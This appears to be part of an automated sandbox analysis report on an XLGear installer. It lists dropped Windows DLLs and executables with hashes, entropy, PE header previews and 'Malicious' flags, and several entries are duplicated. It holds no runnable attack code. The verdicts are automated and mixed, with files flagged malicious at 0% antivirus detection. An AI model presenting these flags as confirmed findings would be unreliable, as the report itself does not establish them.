                                                                        Entropy (8bit):6.506120067282535
                                                                        Encrypted:false
                                                                        SSDEEP:12288:5/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRMh1K8xyF:dkqZ1G7DMvrP537dzHsA6hcHGbH3Euhs
                                                                        MD5:A0CFF52B882184452424B6E618FA061B
                                                                        SHA1:C3985E364276F258B06A7B0DC1B87215B8FCDD80
                                                                        SHA-256:F1EF7FD69A948204ED5F004B7621E7DE57320319A5F358ADC89FC30F0F06A953
                                                                        SHA-512:722871F86BFECD794A9E0246B87CCF5CF0F62787D50F383F6F71B565D9AA10687703A267A665C395958C44BF9975C0CF6BD8A1FC1A2D7B8F5584DD2D7D078871
                                                                        Malicious:true
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):265728
                                                                        Entropy (8bit):6.4472652154517345
                                                                        Encrypted:false
                                                                        SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                        MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                        SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                        SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                        SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):176128
                                                                        Entropy (8bit):6.204917493416147
                                                                        Encrypted:false
                                                                        SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                        MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                        SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                        SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                        SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):1645320
                                                                        Entropy (8bit):6.787752063353702
                                                                        Encrypted:false
                                                                        SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                        MD5:871C903A90C45CA08A9D42803916C3F7
                                                                        SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                        SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                        SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):1645320
                                                                        Entropy (8bit):6.787752063353702
                                                                        Encrypted:false
                                                                        SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                        MD5:871C903A90C45CA08A9D42803916C3F7
                                                                        SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                        SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                        SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):265728
                                                                        Entropy (8bit):6.4472652154517345
                                                                        Encrypted:false
                                                                        SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                        MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                        SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                        SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                        SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):645592
                                                                        Entropy (8bit):6.50414583238337
                                                                        Encrypted:false
                                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):499712
                                                                        Entropy (8bit):6.414789978441117
                                                                        Encrypted:false
                                                                        SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                        MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                        SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                        SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                        SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):176128
                                                                        Entropy (8bit):6.204917493416147
                                                                        Encrypted:false
                                                                        SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                        MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                        SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                        SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                        SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:MS Windows HtmlHelp Data
                                                                        Category:dropped
                                                                        Size (bytes):78183
                                                                        Entropy (8bit):7.692742945771669
                                                                        Encrypted:false
                                                                        SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                        MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                        SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                        SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                        SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                        Malicious:false
                                                                        Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):348160
                                                                        Entropy (8bit):6.542655141037356
                                                                        Encrypted:false
                                                                        SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                        MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                        SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                        SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                        SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):3397185
                                                                        Entropy (8bit):6.501948936593034
                                                                        Encrypted:false
                                                                        SSDEEP:49152:Icpp64wB/nwOGSXpzopPdJTp19zxJwBv1g58fR:ISp61nRx5zopPdJTT9zxmw58fR
                                                                        MD5:861098E5924051934AC2F9B85677EFD9
                                                                        SHA1:B5EFBD2812ADE331443837A8365395132400108C
                                                                        SHA-256:6A6CA4E72479D68BBD99618DD2C15608C5F6257CE3D5E67F577D2021B6769A91
                                                                        SHA-512:41E58A9CF7AE965296DF22FCEF9C14D08691A382AFA050694F8EE499F8D2E3DA170F164E0F23587F8FB88C055570E43E626DA0870C01A626722E0B8E70828475
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-S3UFM.tmp, Author: Joe Security
                                                                        Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...i..L.........................................@..........................@4.......4..................................................U...........................................................................................................stum8.............................. ..`.stun8..l...........................@..@.stuo8...d...0...2..................@....rsrc....V.......V...B..............@..@.stup8...@......A>..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):445440
                                                                        Entropy (8bit):6.439135831549689
                                                                        Encrypted:false
                                                                        SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                        MD5:CAC7E17311797C5471733638C0DC1F01
                                                                        SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                        SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                        SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):445440
                                                                        Entropy (8bit):6.439135831549689
                                                                        Encrypted:false
                                                                        SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                        MD5:CAC7E17311797C5471733638C0DC1F01
                                                                        SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                        SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                        SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):499712
                                                                        Entropy (8bit):6.414789978441117
                                                                        Encrypted:false
                                                                        SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                        MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                        SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                        SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                        SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):348160
                                                                        Entropy (8bit):6.542655141037356
                                                                        Encrypted:false
                                                                        SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                        MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                        SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                        SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                        SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):645592
                                                                        Entropy (8bit):6.50414583238337
                                                                        Encrypted:false
                                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):715253
                                                                        Entropy (8bit):6.5146632006329614
                                                                        Encrypted:false
                                                                        SSDEEP:12288:B/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRMh1K8xyF/:VkqZ1G7DMvrP537dzHsA6hcHGbH3EuhG
                                                                        MD5:317EF0BA2AF7B18B55096279F8FD1591
                                                                        SHA1:F7197AC8FE9FD4B5992139E65FDF68C0A4025EBB
                                                                        SHA-256:1B3AAF4CA0365009D5CD77E33397AC051F7D8AB03483A104DF025EC1B9799955
                                                                        SHA-512:ECEE1445960F5BBF7DFEF3B5AE46F278B88778A4B3CE6C590CEB53A4F310B71A336D6A3D8CC8C8D7809E1578341D1021CC44FBD881C58E62FCB96B2C36BCBCB0
                                                                        Malicious:true
                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:InnoSetup Log XLGear, version 0x30, 4806 bytes, 065367\user, "C:\Users\user\AppData\Local\XLGear 3.1.3.157"
                                                                        Category:dropped
                                                                        Size (bytes):4806
                                                                        Entropy (8bit):4.730907338717463
                                                                        Encrypted:false
                                                                        SSDEEP:96:jLnWaGn8ipV7bbr9t+eOIhma7ICSss/LnhL+I:HnWaGnVpV7KHIhxICSsAnhF
                                                                        MD5:A97193D07E3E719C3685728B02989889
                                                                        SHA1:12FFEAD8249C8D852CEDC2ED78A9D858F522F7AF
                                                                        SHA-256:86C935636E1EAE8363EABAF75294169A9C478E3C4FC3D968AD434E53397EFD8F
                                                                        SHA-512:BE9B8EDA1CD9FF7F031652BC7809C47E7E3836A9D21C339D0017C046FB48EB395BB1410C843675A5C3B002183707C960BF8D385165121D498C5CF003934ED91C
                                                                        Malicious:false
                                                                        Preview:Inno Setup Uninstall Log (b)....................................XLGear..........................................................................................................................XLGear..........................................................................................................................0...........%..................................................................................................................%........d.&......M....065367.user-C:\Users\user\AppData\Local\XLGear 3.1.3.157........... .8.... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dl
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):715253
                                                                        Entropy (8bit):6.5146632006329614
                                                                        Encrypted:false
                                                                        SSDEEP:12288:B/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRMh1K8xyF/:VkqZ1G7DMvrP537dzHsA6hcHGbH3EuhG
                                                                        MD5:317EF0BA2AF7B18B55096279F8FD1591
                                                                        SHA1:F7197AC8FE9FD4B5992139E65FDF68C0A4025EBB
                                                                        SHA-256:1B3AAF4CA0365009D5CD77E33397AC051F7D8AB03483A104DF025EC1B9799955
                                                                        SHA-512:ECEE1445960F5BBF7DFEF3B5AE46F278B88778A4B3CE6C590CEB53A4F310B71A336D6A3D8CC8C8D7809E1578341D1021CC44FBD881C58E62FCB96B2C36BCBCB0
                                                                        Malicious:true
                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp
                                                                        File Type:MS Windows HtmlHelp Data
                                                                        Category:dropped
                                                                        Size (bytes):78183
                                                                        Entropy (8bit):7.692742945771669
                                                                        Encrypted:false
                                                                        SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
